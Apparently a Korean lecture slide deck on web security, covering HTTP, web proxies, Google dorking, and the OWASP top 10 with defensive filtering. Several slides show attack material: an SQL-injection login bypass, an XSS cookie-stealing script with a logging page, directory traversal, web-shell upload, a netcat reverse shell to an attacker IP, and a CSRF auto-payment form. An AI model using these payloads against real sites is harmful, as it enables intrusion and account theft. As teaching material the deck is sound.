PowerPoint 프레젠테이션
|
|
- 용만 정
- 5 years ago
- Views:
Transcription
1 Chapter 04. 웹보안 : 웹, 그무한한가능성과함께성장한해킹
2 1. 웹에대한이해 2. HTTP에대한이해 3. 웹서비스에대한이해 4. 웹해킹에대한이해 5. 웹의주요취약점 10가지 6. 웹취약점보안
3 01 웹에대한이해 인터넷의역사 처음에는대학에서연구실간데이터전송을위해, 단순히하나의시스템과다른하나의시스템간의통신을위한프로토콜을만듦. 프로토콜을해석한후이를다른프로토콜로바꾸어다른시스템으로전송해주는장치인게이트웨이 (Gateway) 가개발됨. 1969년에는미국방부산하고등연구계획국 ARPA(Advanced Research Projects Agency) 에의해전세계주요거점을연결하는네트워크가만들어짐. 이네트워크를알파넷이라부르는데, 흔히들이알파넷을인터넷의시작이라고칭함. [ 그림 4-1] UCLA의최초의네트워크노드 1994년한국통신이카이스트와연구기관등에학술교육 / 정보교류용으로제공한 하나망 을일반에개방하여코넷 (KORNET) 을시작함으로써인터넷에첫발을내딛게됨. WWW(World Wide Web) : 세계규모의거미집또는거미집모양의망이라는뜻. ( 짧게 웹 이라고함.) 1989년스위스제네바에있는유럽원자핵공동연구소 (CERN) 에서근무하던팀버너스리 (Tim Berners Lee) 에의해연구목적의프로젝트로시작됨.
4 01 웹에대한이해 인터넷의역사 [ 그림 4-2] 초기의 ARPA 네트워크 WWW 프로젝트의목적은전세계에흩어져있는종업원및연구자와연구결과나아이디어를공유할수있는방법을모색하는것이었음. 초기계획할당시에는웹을 Hyper Text Project 라고명명했음. Hyper Text 는 60년대에테드넬슨이만든신조어로써다른문서와연관관계를가지는텍스트를뜻함. Hyper Text를이용하면단어나문구를마우스로클릭해서관련주제에대한정보를추가로얻을수있음. 현재웹문서로가장흔히쓰이는 HTML(Hyper Text Markup Language) 은이 Hyper Text를효과적으로전달하기위한스크립트언어. 웹에접근하기위해서는웹브라우저인모자이크의경우 1992년배포 글자위에서마우스버튼을클릭할수있는하이퍼링크 (Hyper Link) 가처음구현됨. 1994년에발표된네스케이프네비게이터는인터넷의대중화에기여했지만현재는사라짐.
5 02 HTTP 에대한이해 HTTP 프로토콜 0.9 버전부터사용됨. 0.9 버전은서버로부터의단순읽기기능만지원. 클라이언트가웹브라우저를이용해서버에연결을요청하면, 연결요청을받은서버는그클라이언트에대해서비스를준비한다. 서버가준비상태가되면 (➊), 클라이언트는읽고자하는문서를서버에요청한다 (➋). 서버는웹문서중클라이언트가요청한문서를클라이언트에전송하고 (➌) 연결을끊는다 (➍). 0.9 버전은하나의웹페이지안에서도텍스트와그림마다 Connect 과정을반복해서거쳐야했기때문에무척비효율적임. [ 그림 4-3] HTTP 0.9 버전의연결
6 02 HTTP 에대한이해 HTTP Request HTTP Request는웹서버에데이터를요청하거나전송할때보내는패킷 GET 방식 가장일반적인 HTTP Request 형태 웹브라우저에요청데이터에대한인수를 URL(Uniform Resource Locator) 을통해전송 POST 방식 HTTP 헤더에데이터를전송 인수값을 URL을통해전송하지않으므로다른이가링크를통해해당페이지를볼수없음. 파일업로드는 POST 방식으로만할수있음 데이터가 URL을통해서노출되지않기때문에최소한의보안성을갖추고있기때문. 일반적으로게시판의목록이나글보기화면은접근자유도를부여하기위해 GET 방식을사용하고글저장 / 수정 / 삭제나많은양의데이터를전송할때는 POST 방식을사용. 기타방식 HEAD 방식 : 서버측의데이터를검색하고요청하는데사용 OPTIONS 방식 : 자원에대한요구 / 응답관계에서관련된선택사항의정보를요청할때사용. 이를통해클라이언트는어느것을선택할지결정할수있고, 자원과관련된필요사항도결정할수있음. PUT 방식 : 메시지에포함되어있는데이터를지정한 URI(Uniform Resource Identifier) 장소에그이름으로저장 DELETE 방식 : URI에지정되어있는자원을서버에서지울수있게함. TRACE 방식 : 요구메시지의최종수신처까지의루프백검사용으로쓰임. 즉클라이언트가보내는요구메시지가거쳐가는프록시나게이트웨이의중간경로및최종수신서버까지이르는경로를알아내는데사용
7 02 HTTP 에대한이해 HTTP Response 클라이언트의 Request 에대한응답패킷. 헤더정보뒤에는실제데이터 (HTML 이나그림파일 ) 가전달됨. 데이터전달이끝나면서버는연결을끊음. [ 표 4-1] HTTP Response의주요실행결과코드 실행결과코드 내용 설명 100번대 정보전송 HTTP/1.0까지는계열에대한어떤정의도이루어지지않았기때문에실험적인용도이외에는 100대서버측의응답은없다. 200번대 성공 클라이언트의요구가성공적으로수신되어처리되었음을의미한다. 300번대 리다이렉션 해당요구사항을처리하기위해사용자에이전트에의해수행되어야할추가적인동작이있음을의미한다. 400번대 클라이언트측에러 클라이언트에오류가발생한경우사용된다. 예를들면클라이언트가서버에보내는요구메시지를완전히처리하지못한경우등이다. 500번대 서버측에러 서버자체에서발생된오류상황이나요구사항을제대로처리할수없을때사용된다.
8 03 웹서비스에대한이해 HTML 가장단순한형태의웹언어. 웹서버에 HTML 문서를저장하고있다가클라이언트가특정 HTML 페이지를요청하면해당 HTML 문서를클라이언트로전송해줌. 이런웹페이지를정적인 (Static) 웹페이지라고함. 클라이언트의웹브라우저를통해웹서버의무엇인가를바꿀수있는가능성이매우낮기때문에웹을이용한공격이매우어려움. [ 그림 4-5] 정적인웹페이지접근시웹문서전송
9 03 웹서비스에대한이해 SSS ASP 나 JSP 와같은동적인페이지를제공하는스크립트를 SSS(Server Side Script) 라함. 스크립트에 HTML 확장자대신 ASP 또는 JSP 의확장자를가진웹문서를요청하면 ASP 는 DLL 이나 OCX 같은파일을이용해, JSP 는서블릿을이용해요청을처리. 그다음그결과를 HTML 파일로만들어클라이언트에전송. [ 그림 4-6] 동적인웹페이지접근시웹문서전송
10 03 웹서비스에대한이해 CSS 웹서비스에이용되는스크립트에는자바스크립트 (JavaScript) 나비주얼베이직스크립트 (Visual Basic Script) 등이있음. 이들은서버가아닌클라이언트측의웹브라우저에의해해석되고적용됨. 이를 CSS(Client Side Script) 라함. [ 그림 4-7] CSS 로만든웹페이지접근시클라이언트의동작
11 04 웹해킹에대한이해 웹취약점스캐너를통한정보수집 장점 : 웹취약점스캐너를통한정보수집은빠른시간내에다양한접속시도를수행할수있음. 단점 : 웹구조를파악하고취약점을수집하기가쉽지않음. [ 그림 4-8] Acunetix 웹취약점스캐너
12 04 웹해킹에대한이해 웹프록시를통한취약점분석 웹프록시는클라이언트가웹서버와웹브라우저간에전달되는모든 HTTP 패킷을웹프록시를통해서확인하 면서수정하는것이가능. [ 그림 4-9] 웹프록시의동작구조
13 04 웹해킹에대한이해 웹프록시를통한취약점분석 웹프록시로 burp suite를사용해보자. [ 도구 ]-[ 인터넷옵션 ]-[ 연결 ]-[LAN 설정 ] 에서프록시서버를다음과같이설정해주어야함 을흔히루프백 (Loopback) 주소라하는데, PC 자기자신을의미함. 8080은웹프록시프로그램의서비스포트 [ 그림 4-13] 웹프록시의설정 : [LAN 설정 ]-[ 프록시서버 ]
14 04 웹해킹에대한이해 웹프록시를통한취약점분석 서버에서클라이언트로전송되는패킷변조 웹사이트가어떤언어로개발됐든지웹프록시를통해서확인하는것은 HTML. 테스트환경으로사용하는웹페이지의게시판에서하나의글에대한열람을시도해보자. [ 그림 4-15] 테스트 1 입니다. 문서열람시도 테스트 1 입니다. 라는제목을클릭하면다음과같은내용을확인할수있다. [ 그림 4-16] 열람한 테스트 1 입니다. 의내용
15 04 웹해킹에대한이해 서버에서클라이언트로전송되는패킷변조 값을 으로바꿔보자. [ 그림 4-18] 웹프록시를통해 변조 전송해보자. [ 그림 4-19] 을변조한 테스트 1 입니다. 의내용
16 04 웹해킹에대한이해 서버에서클라이언트로전송되는패킷변조 클라이언트에해킹하고자하는대상이있는경우 웹브라우저내용만바꾸었지만실제로는 Active X 등의형태로여러프로그램이클라이언트에설치되어웹서비스를제공하는경우가많음. 이때클라이언트에설치된서비스프로그램을속이는것이가능 서버에서클라이언트에정보를전송했다가이를다시전송받아처리하는경우 예를들면서버에서변수 A의값이 20임을확인하고이값을클라이언트에전송 그리고서버는전송한변수 A가필요할때자신의데이터베이스에서다시읽지않고, 클라이언트가관련서비스수행할때서버에다시전송해주는 A 값을참조하여서비스를수행하는경우 [ 그림 4-20] 클라이언트에전송한변수값을서버가참조
17 04 웹해킹에대한이해 서버에서클라이언트로전송되는패킷변조 2 단계에서 A=40 이라고바꾸어전송하면 A 값이다음과같이흘러감. [ 그림 4-21] 클라이언트에변조하여전송한변수값을서버가참조 패킷변조의예 [ 그림 4-22] 당첨권을위변조하여경품을받는경우
18 04 웹해킹에대한이해 서버에서클라이언트로전송되는패킷변조 테스트 1 입니다. 의글을조회하는과정에서 HTTP 패킷을웹프록시에서확인해보자. 해당글에대한인수값 (num=1) 이전달되는것을확인할수있음. [ 그림 4-23] 서버에서클라이언트로전송되는패킷 GET 을통해서게시판의첫번째글 /bbs/board_view.asp?num=1 을보여줄것을서버에요청 num 값을 2 로바꾸어전송 [ 그림 4-24] 서버에서클라이언트로전송되는패킷변조
19 04 웹해킹에대한이해 클라이언트에서서버로전송되는패킷변조 패킷을보내면 2 번글이다음과같이조회되는것을확인할수있음. [ 그림 4-25] 변경된본문내용 클라이언트에서서버로전송되는패킷을변조하는것은일반적인웹서비스의메뉴상접속할수없는것에접 근하거나특정한값을넣어시스템의오작동을유도하기위한목적으로사용.
20 04 웹해킹에대한이해 구글해킹을통한정보수집 많은정보를수집하기위해서는검색엔진을이용하면유용 검색엔진중에는구글이많이사용됨. [ 표 4-2] 구글에서제공하는고급검색기능 검색인자 설명 검색추가인자 site 특정도메인으로지정한사이트에서검색하려는문자열이포함된사이트를찾음 YES filetype 특정한파일유형에한해서검색하는문자가들어있는사이트를찾음 YES link 링크로검색하는문자가들어있는사이트를찾음 NO cache 특정검색어에해당하는캐시된페이지를보여줌 NO intitle 페이지의제목에검색하는문자가들어있는사이트를찾음 NO inurl 페이지의 URL에검색하는문자가들어있는사이트를찾음 NO
21 04 웹해킹에대한이해 구글해킹을통한정보수집 주요검색인자 site : 특정사이트만을집중적으로선정해서검색할때유용 wishfree.com 도메인이있는페이지에서 admin 문자열을찾으라는예 site:wishfree.com admin filetype : 특정파일유형에대해검색할때사용한다. 파일확장자가 txt 이고패스워드라는문자열이들어간파일을검색한화면 filetype:txt 패스워드 [ 그림 4-26] filetype 기능의예제결과
22 04 웹해킹에대한이해 구글해킹을통한정보수집 주요검색인자 intitle : 디렉터리리스닝취약점이존재하는사이트를쉽게찾을수있음. intitle:index.of admin [ 그림 4-27] 디렉터리리스팅이가능한사이트검색
23 04 웹해킹에대한이해 구글해킹을통한정보수집 검색엔진의검색을피하는방법 가장일반적인대응법 : 웹서버의홈디렉터리에 robots.txt 파일을만들어검색할수없게만듦. 파일이있으면구글검색엔진은 robots.txt에있는디렉토리는검색하지않음. robots.txt 파일은 Useragent와 Disallow를이용 User-agent는구글검색엔진으로부터의검색을막기위해서다음과같이사용. User-agent: googlebot 구글검색엔진의검색을막는다. User-agent: * 모든검색로봇의검색을막는다. Disallow: dbconn.ini dbconn.ini 파일을검색하지못하게한다. Disallow: /admin/ admin 디렉터리에접근하지못하게한다.
24 04 웹해킹에대한이해 구글해킹을통한정보수집 검색엔진의검색을피하는방법 미국백악관에서실제로사용하는 robot.txt 파일의내용을살펴보는것도좋음. [ 그림 4-28] 의내용
25 05 웹의주요취약점 10 가지 OWASP 국제웹보안표준기구 OWASP(The Open Web Application Security Project) 해마다웹관련상위 10 개의주요취약점을발표 [ 그림 4-29] OWASP 사이트
26 05 웹의주요취약점 10 가지 명령삽입취약점 member 테이블조회 select * from [web].[dbo].[member]; [ 그림 4-30] MS-SQL 2008 에서 member 테이블조회 왼쪽에는지금까지우리가이용한서버의데이터베이스목록이보임. 마지막에웹서버와연동되는 web이라는데이터베이스가위치 사용자정보테이블인 member 테이블의정보를확인하면 wishfree라는계정이 qwer1234라는패스워드로존재
27 05 웹의주요취약점 10 가지 명령삽입취약점 특정사용자에대해아이디목록을조회 select user_id from [web].[dbo].[member] where user_id ='wishfree'; [ 그림 4-31] member 테이블에서 wishfree ID 조회
28 05 웹의주요취약점 10 가지 명령삽입취약점 웹에서사용자가 ID와패스워드입력창에자신의 ID와패스워드를입력하면아래와같은 SQL문이작성되어데이터베이스에전송됨. select user_id from [web].[dbo].[member] where user_id =' 입력된아이디 ' AND user_pw=' 입력된패스워드 ' 입력된 ID 와패스워드가동일한계정이있으면아래의결과창에해당 ID(wishfree) 가출력됨. select user_id from [web].[dbo].[member] where user_id ='wishfree' AND user_pw='qwer1234' [ 그림 4-32] user_id, user_pw 를조건으로입력하고 member 테이블조회
29 05 웹의주요취약점 10 가지 명령삽입취약점 잘못된패스워드입력 select user_id from [web].[dbo].[member] where user_id ='wishfree' AND user_pw='qwer' [ 그림 4-33] 잘못된 user_pw 를조건으로입력하고 member 테이블조회
30 05 웹의주요취약점 10 가지 명령삽입취약점 실제웹소스의로그인처리부분 Query = "SELECT user_id FROM member WHERE user_id = '"&struser_id& ' AND password = '&strpassword&" ' " strauthcheck = GetQueryResult(Query) If strauthcheck = " " then boolauthenticated = False Else boolauthenticated = True EndIf SQL 삽입공격은어떤수단을쓰든 SQL 의결과값이 NULL 이나오지않게, 즉출력값이사용자 ID 가되도록 하여로그인하는것. 조건값에 ' or ''=' 을입력하면 where 로입력되는조건문을항상참으로만들수있음. [ 그림 4-34] 인증우회를위한 SQL 삽입공격이적용된 SQL 쿼리
31 05 웹의주요취약점 10 가지 명령삽입취약점 SQL 삽입공격확인 SELECT user_id FROM [web].[dbo].[member] WHERE user_id = '' or ''='' AND user_pw = '' or ''='' [ 그림 4-35] user_id, user_pw 에 or = 을입력하고 member 테이블조회
32 05 웹의주요취약점 10 가지 명령삽입취약점 웹에서잘못된 ID 와패스워드입력시 [ 그림 4-36] 잘못된 ID 와패스워드를이용한로그인시도 웹에서 SQL 삽입공격시 ( or = 입력 ) [ 그림 4-38] 로그인성공 SQL 삽입공격에사용되는 SQL문은무엇이라도 SQL 삽입공격에사용될수있음. SQL 삽입공격은로그인뿐만아니라웹에서사용자의입력값을받아데이터베이스에 SQL문으로데이터를요청하는모든곳에가능
33 05 웹의주요취약점 10 가지 XSS 취약점 XSS(Cross Site Scripting) 는공격자에의해작성된스크립트가다른사용자에게전달되는것. 다른사용자의웹브라우저내에서적절한검증없이실행 사용자의세션을탈취하거나, 웹사이트를변조하거나혹은악의적인사이트로사용자를이동시킬수있음. [ 그림 4-39] XSS 공격의구조 임의의 XSS 취약점이존재하는서버에 XSS 코드를작성하여저장 일반적으로공격자는임의의사용자또는특정인이이용하는게시판을이용 해당웹서비스사용자가공격자가작성해놓은 XSS 코드에접근 사용자는본인이공격자가작성해놓은 XSS 코드에접근하는것을인지하지못함. 웹서버는사용자가접근한 XSS 코드가포함된게시판의글을사용자에게전달 사용자시스템에서 XSS 코드가실행 XSS 코드가실행된결과가공격자에게전달되고공격자는공격을종료
34 05 웹의주요취약점 10 가지 XSS 취약점 XSS 가포함된글을게시판에올려해당글을읽는사용자의쿠키값을획득 쿠키값을획득하기위한간단한코드 (GetCookie.asp) 를미리만듦. GetCookie.asp <% %> testfile=server.mappath("getcookie.txt") cookie=request("cookie") set fs=server.createobject("scripting.filesystemobject") set thisfile=fs.opentextfile(testfile,8,true,0) thisfile.writeline(""&cookie&"") thisfile.close set fs=nothing
35 05 웹의주요취약점 10 가지 XSS 취약점 XSS 공격용스크립트를작성 [ 그림 4-40] 게시판에 XSS 취약점을이용한공격코드작성 사용된 XSS 코드 <script>location.href="
36 05 웹의주요취약점 10 가지 XSS 취약점 게시판을열람할때웹서버 ( ) 로현재해당문서를읽는사용자의쿠키값을전달 업로드된글을사용자가읽으면화면상에아무것도나타나지않음. [ 그림 4-41] XSS 코드가포함된글열람 공격자는이미피해자의쿠키를확보하여해당웹페이지에접속함. [ 그림 4-42] 피해자로부터전달받은쿠키
37 05 웹의주요취약점 10 가지 XSS 취약점 해당게시판의 XSS 공격의취약성여부는다음과같은간단한 XSS 코드를게시판에입력해보고해당게시판의 글을열람해보면확인할수있음. <script>alert(document.cookie)</script> [ 그림 4-43] XXS 취약점확인
38 05 웹의주요취약점 10 가지 취약한인증및세션관리 취약한패스워드설정 취약한인증의가장기본적인문제점은패스워드설정 사용자측데이터를이용한인증 최초인증과정은정상적인아이디와패스워드의입력으로시작 [ 그림 4-44] 사용자측데이터를이용한인증과정 1 단계 웹서버에서해당아이디와패스워드가올바른경우접속인증을해줌. 인증값으로쿠키와같은세션값을넘겨줌. 정상적인인증 [ 그림 4-45] 사용자측데이터를이용한인증과정 2 단계
39 05 웹의주요취약점 10 가지 취약한인증및세션관리 사용자측데이터를이용한인증 웹서버는공격자가새로운페이지에접근할때수신한인증허용값을전달받으면서해당세션이유효한인증인지확인 이때공격자가전달해주는값 ( 아이디및사용자고유번호등 ) 을이용해해당인증의소유자 (Identity) 를구분 [ 그림 4-46] 사용자측데이터를이용한인증과정 3 단계 공격자는세션인증값은그대로사용하고 UserNo 값만변경함으로써다른계정으로로그인한것처럼웹서 비스를이용할수있음. [ 그림 4-47] 사용자측데이터를이용한인증취약점공격
40 05 웹의주요취약점 10 가지 직접객체참조 디렉터리탐색 디렉터리탐색 (Directory Traversal) 은웹브라우저에서확인가능한경로의상위로탐색하여특정시스템파일을다운로드하는공격방법 자료실에올라간파일을다운로드할때전용다운로드프로그램이파일을가져오는데, 이때파일이름을필터링하지않아서발생하는취약점 게시판등에서첨부파일을다운로드할때다음과같이 down.jsp 형태의 SSS 를주로사용 사업계획.hwp 게시판에서글목록을보여주는 list.jsp 파일이 board 에위치한다면주소창에다 음과같이입력하여다운로드가능.
41 05 웹의주요취약점 10 가지 직접객체참조 디렉터리탐색 파일시스템에서. 은현재디렉토리를,.. 은상위디렉토리를의미 공격자가 filename 변수에../list.jsp 입력 다운로드가기본적으로접근하는 /board/upload 디렉토리의바로상위디렉토리에서 list.jsp를다운로드하라는의미 [ 그림 4-48].. 을이용한임의디렉터리파일다운로드
42 05 웹의주요취약점 10 가지 직접객체참조 디렉터리탐색 /board/admin 디렉토리에있는 adminlogin.jsp를다운로드하려면다음과같이입력. download.jsp 파일자신도다음과같이다운로드할수있음. 시스템내부의중요파일도위와같은방법으로다운로드를시도 유닉스시스템의경우 /etc/passwd 와같이사용자계정과관련된중요파일을다음과같은형태로시도해볼수있음.
43 05 웹의주요취약점 10 가지 직접객체참조 파일업로드제한부재 클라이언트에서서버측으로임의의파일을보낼수있는취약점은웹서버가가질수있는가장치명적인취약점 공격자는웹서버에악의적인파일을전송하고, 원격지에서해당파일을실행하여웹서버를장악하며추가적인내부침투공격을수행할수있게되기때문. 웹해킹의최종목표인리버스텔넷과같은웹서버의통제권을얻기위해반드시성공해야하는공격 이런취약점이존재하는가장일반적인형태는게시판 게시판에첨부파일로악의적인파일을업로드하고실행시키는것» 이때첨부파일로업로드하는악성코드는대부분웹쉘 [ 그림 4-49] 웹쉘업로드후수행
44 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 웹해킹을통해시스템의권한을획득한후해당시스템에텔넷과같이직접명령을입력하고확인할수있는쉘을획득하기위한방법 방화벽이존재하는시스템을공격할때자주사용 일반적으로웹서버는방화벽내부에존재하고웹서버는 80번포트를이용한웹서비스만제공하면되기때문에, 방화벽은외부인터넷을사용하는사용자에대해 80포트만을허용. 이런경우웹서버의텔넷 (Telnet) 이열려있어도방화벽으로인해공격자가외부에서접근할수없음. [ 그림 4-50] 외부로부터차단된텔넷접속
45 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 심화된공격을하기위해서는텔넷과유사한접근권한을획득하는것이매우중요. 방화벽에서인바운드정책 ( 외부에서방화벽내부로들어오는패킷에대한정책 ) 은 80번포트외에필요한포트만빼고다막아놓지만아웃바운드정책 ( 내부에서외부로나갈때에대한정책 ) 은별다른필터링을수행하지않는경우가많음. 리버스텔넷은이런허점을이용. [ 그림 4-51] 내부에서외부로허용된텔넷접속
46 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 명령창획득 : 파일업로드등을통해공격자가명령을입력할수있는명령창을획득 리버스텔넷용툴업로드 : nc와같은리버스텔넷용툴을서버게시판의파일업로드기능을이용해업로드 [ 그림 4-52] nc 툴의업로드 공격자 PC 리버스텔넷데몬활성화 : 서버에서리버스텔넷을보내면이를받아텔넷을열수있도록다음과같이리버스텔넷툴을실행시킴. nc -l -p 80 [ 그림 4-53] 공격자 PC 에서리버스텔넷데몬활성화
47 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 획득한명령창을통해공격자에게리버스텔넷을보내준다. 업로드한 nc 파일이위치한전체경로를입력해줘야함. 이때공격자 IP는 c:\inetpub\wwwroot\bbs\upload\nc -e cmd.exe [ 공격자 IP] 80 [ 그림 4-54] 웹서버에서공격자 PC 에리버스텔넷접속요청전송 리버스텔넷창획득 [ 그림 4-55] 웹서버에리버스텔넷연결성공
48 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 IP 가웹서버의 로바뀐것확인 [ 그림 4-56] 웹서버에리버스텔넷연결한후 IP 확인
49 05 웹의주요취약점 10 가지 직접객체참조 리버스텔넷 리버스텔넷예 [ 그림 4-57] 리버스텔넷의예 리버스텔넷예방법 파일업로드를먼저막아야함.» asp뿐만아니라리버스텔넷툴같은것을실행하지못하도록 exe나 com 같은실행파일도업로드를못하게해야함. 외부에서내부로의접속뿐만아니라내부에서외부로의불필요한접속도방화벽으로막는것이좋음.
50 참고 : Netcat 1/2 넷캣 (Netcat) 은 TCP 나 UDP 프로토콜을사용하는네트워크연결에 서데이터를읽고쓰는간단한유틸리티프로그램이다. 일반적으로는 UNIX 의 cat 과비슷한사용법을가지고있지만 cat 이파일에쓰거나읽듯이 nc 는 network connection 에읽거나쓴다. 이것은스크립트와병용하여 network 에대한 debugging, testing tool 로써매우편리하지만반면해킹에도이용범위가넓다. 예제 웹연결 # echo -e "HEAD / HTTP/1.0\n\n" nc httpd.apache.org 80 파일전송 ( 서버 )# nc -l -p 1234 > pstest.out ( 클라이언트 )# nc -w < filename
51 참고 : Netcat 2/2 간단한채팅서버 ( 서버 )# nc -l -p 1234 ( 클라이언트 )# telnet localhost 1234 백도어쉘 ( 서버 )# nc -e /bin/sh -l -p 1234 ( 클라이언트 )# telnet 리버스쉘 ( 서버 )# nc -n -v -l -p 1234 ( 클라이언트 )# nc -e /bin/sh
52 05 웹의주요취약점 10 가지 CSRF 취약점 CSRF(Cross Site Request Forgery) 는특정사용자를대상으로하지않고, 불특정다수를대상으로로그인된사 용자가자신의의지와는무관하게공격자가의도한행위 ( 수정, 삭제, 등록, 송금등 ) 를하게만드는공격 [ 그림 4-58] CSRF 공격의구조 CSRF 공격을이용하면공격자는특정물품을구매하여장바구니에넣어두고, 해당물품에대한결재를다른이 를통해다음과같은형태로수행할수도있음. <body onload = "document.csrf.submin()"> <form name="csrf" action=" method="post"> <input type="hidden" name="uid" value="wishfree"> <input type="hidden" name="mode" value="pay_for_order"> <input type="hiddne" name="amount" value="10000"> </form> CSRF 가성립하려면수정 삭제 등록하는액션에서사용자를구분하는파라메터값이존재하지않아야함. 특정한사용자를구분하는인수가있으면하나의사용자에게만적용되거나인증과정을통해 CSRF 공격을 막을수있음.
53 05 웹의주요취약점 10 가지 보안설정취약점 디렉터리리스팅 웹브라우저에서웹서버의특정디렉터리를열면그디렉터리에있는파일과목록이모두나열되는것 [ 그림 4-59] 디렉터리리스팅의예 백업및임시파일존재 웹서버에백업파일이나임시파일들을삭제하지않은채방치할경우 공격자가이파일들을발견시웹어플리케이션의내부로직및데이터베이스접속정보등중요한정보를획득할수있음. 주석관리미흡 일반적으로프로그램의주석은개발자만볼수있으나, 웹어플리케이션은웹프록시를통해이용자도볼수있음. 주석에는개발과정이나웹어플리케이션의관리목적으로주요로직에대한설명, 디렉터리구조, 테스트소스정보, 등의여러가지정보가기록될수있으니개발시주석에기록되는정보를주의
54 05 웹의주요취약점 10 가지 취약한정보저장방식 개인정보유출의중요한원인은웹취약점뿐만아니라, 많은웹어플리케이션이신용카드번호, 주민등록번호, 그리고인증신뢰정보와같은민감한데이터를보호하지않기때문. 보호하려는데이터의중요도에따라암호화로직을사용하고, 데이터베이스테이블단위에서암호화를수행해야함. URL 접근제한실패 관리자페이지나인증이필요한페이지에대한인증미처리로인해인증을우회하여접속할수있게됨. 이취약점에노출되면일반사용자나로그인하지않은사용자가관리자페이지에접근하여관리자권한의기능 을악용할수있음. 인증우회의예 관리자로로그인해서관리자용웹페이지에접속할수있어야하는데, 로그인을하지않고도관리자용웹페 이지에서특정작업을직접수행할수있는것 를통해관리자로로그인한후에야 boardadmin.asp 에접근할수있어야하는데, 관리자로로그인하지않은채로 boardadmin.asp 에바로접근해게시판을관리하는경우. 인증우회의보안책 인증우회를막기위해서는웹에존재하는중요페이지에세션값 ( 쿠키 ) 을확인하도록검증로직을입력함.
55 05 웹의주요취약점 10 가지 인증시비암호화채널사용 최근에는인터넷뱅킹과같이보안성이중요한시스템에서는웹트래픽을암호화함. 이때사용되는암호화알고리즘이약하거나암호화하는구조에문제가있다면웹트래픽은복호화되거나위변조될수있음. 부적절한오류처리 웹페이지를이용하다보면자동으로다른페이지로리다이렉트 (Redirect) 하거나포워드 (Forward) 하는경우가종종발생 이때목적페이지에리다이렉트하기위해신뢰되지않은데이터를사용할경우적절한확인절차가없으면공격자는피해자를피싱사이트나악의적인사이트로리다이렉트할수있고, 권한없는페이지의접근을위해사용할수도있음.
56 06 웹의취약점보완 특수문자필터링 웹해킹의가장기본적인형태중하나인인수조작 인수조작은예외적인실행을유발시키기위해일반적으로특수문자를포함하게되어있음. [ 표 4-3] 필터링대상주요특수문자 주요특수문자 주요관련공격 < XSS > XSS & XSS XSS? XSS XSS, SQL 삽입공격 - - SQL 삽입공격 = SQL 삽입공격 ; SQL 삽입공격 * SQL 삽입공격. SQL 삽입공격.. SQL 삽입공격 / XSS, 디렉터리탐색
57 06 웹의취약점보완 특수문자필터링 아이디와패스워드를넣는부분에 문자열을입력받지못하도록 ASP 코드를수정 if check_id="y" then Response.Cookies("user_id")=id Response.Cookies("user_id").Expires = date() end if id = replace(id,"'","''") password = replace(password,"'","''") if instr(id,"'") or instr(password,"'")then %> <script language=javascript> alert(" 입력할수없는문자입니다.\n\n"); history.back(); </script> [ 그림 4-60] 사용자의입력을필터링한후 SQL 삽입공격실패
58 06 웹의취약점보완 특수문자필터링 XSS 공격은다음과같은함수를이용해서본문에포함되는주요특수문자를제거할수있음. function RemoveBad(InStr){ InStr = InStr.replace(/\</g,""); } InStr = InStr.replace(/\>/g,""); InStr = InStr.replace(/\&/g,""); InStr = InStr.replace(/\"/g,""); InStr = InStr.replace(/\?/g,""); InStr = InStr.replace(/\'/g,""); InStr = InStr.replace(/\//g,""); return InStr;
59 06 웹의취약점보완 서버측통제작용 CSS 기반의언어는웹프록시를통해웹브라우저에전달되기때문에웹프록시를통해전달되는과정에서변 조될가능성이있음. [ 그림 4-61] 사용자의입력을핉터링한후 SQL 삽입공격실패 따라서 CSS 기반의언어로필터링할경우공격자가필터링로직만파악하면쉽게필터링이무력화됨. 필터링로직은 ASP, JSP 등과같은 SSS 로필터링을수행해야함. 지속적인세션관리 URL 접근제한실패를막기위해서는기본적으로모든웹페이지에세션에대한인증을수행해야함. 모든웹페이지에대해일관성있는인증로직을적용하려면기업단위에서또는웹사이트단위에서세션인증로직을표준화해야하고, 모든웹페이지를개발할때해당표준을준수하도록해야함.
<4D F736F F F696E74202D FC0CEC5CDB3DD20BAB8BEC8205BC8A3C8AF20B8F0B5E55D>
이장에서다룰내용 정보보안개론 5 장 1 HTTP 프로토콜의동작원리를이해한다. 1 2 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 2 3 웹해킹에서파일접근과관련된공격을살펴본다. 3 4 리버스텔넷을이해한다. 2 5 웹에서의인증의구조와이를우회하는방법을알아본다. 3 6 패킷변조를통해가능한공격을살펴본다. 2 7 XSS 공격및 SQL 삽입공격을살펴본다. Section
More information정보보안개론 5 장
정보보안개론 5 장 이장에서다룰내용 1 1 2 2 3 3 4 2 5 3 6 2 HTTP 프로토콜의동작원리를이해한다. 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 웹해킹에서파일접근과관련된공격을살펴본다. 리버스텔넷을이해한다. 웹에서의인증의구조와이를우회하는방법을알아본다. 패킷변조를통해가능한공격을살펴본다. 7 XSS 공격및 SQL 삽입공격을살펴본다. Section
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More information로거 자료실
